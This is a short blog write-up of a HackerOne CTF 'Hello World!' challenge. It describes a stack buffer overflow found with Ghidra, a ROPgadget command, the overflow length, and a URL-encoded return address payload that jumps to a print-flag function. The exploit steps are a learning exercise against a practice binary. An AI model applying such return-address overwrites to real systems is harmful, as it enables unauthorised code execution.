Lawful Evil (lawful_evil) wrote,
Lawful Evil
lawful_evil

HackerOne CTF Hello World!

On this CTF you face a "What is your name?" and an option to download the binary. 

After downloading it and Ghidra, we open it up and see the name goes into a 0x20 buffer on the stack.   Ok, we should be able to overrun it and overwrite the return value.   After plopping in some characters it looks like I can enter 40 and on next one I get a 'segmentation fault' message.

Well, I dump the ROP gadgets, using 'ROPgadget --binary vulnerable-bin' command in Kali and take a further look.  Ok.. digging further into the binary, I see a 'print flag' function.  Ok, may not need the gadgets.

I just need to convert the address to the right order.   Basically, take 0x004006ee and convert to a 64 bit pointer that is url encoded.    %ee%06%40%00%00%00%00%00

Boom, it prints the flag.
Tags: challenges, ctf, hackerone, hacking, rop
Subscribe

  • HackerOne CTF- Thermostat

    I wasn't sure what to expect with this one. The Thermostat. Android CTF... I didn't have a readily accessible android device... so initially…

  • HackerOne CTF Petshop Pro

    Easy and straightforward shopping. A couple items you can add to a cart and checkout. Playing with the cart a bit, we see that the cart/checkout…

  • HackerOne CTF Postbook

    Postbook... 7 flags at 4 points each. The page looks like it can have a post timeline for posts you create, a way to sign in, sign up, etc. After…

  • Post a new comment

    Error

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.
  • 0 comments